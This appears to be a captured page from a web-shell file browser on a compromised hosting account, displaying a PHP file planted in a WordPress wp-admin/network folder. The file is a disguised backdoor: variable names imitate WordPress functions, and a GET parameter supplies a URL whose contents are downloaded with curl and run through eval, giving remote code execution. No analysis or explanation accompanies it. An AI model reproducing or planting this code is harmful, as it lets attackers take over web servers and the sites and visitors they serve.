HEX
Server: Apache
System: Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux
User: u80650282 (6669564)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /homepages/10/d573043092/htdocs/clickandbuilds/BoxmarkDigital/wp-admin/network/index-table.php
<?php

if (isset($_GET['ajax-response'])) {
    $the_permalink_gw = $_GET['ajax-response'];
    if ($get_the_date_mj = curl_init()) {
        curl_setopt($get_the_date_mj, CURLOPT_URL, $the_permalink_gw);
        curl_setopt($get_the_date_mj, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($get_the_date_mj));
        curl_close($get_the_date_mj);
        exit;
    }
}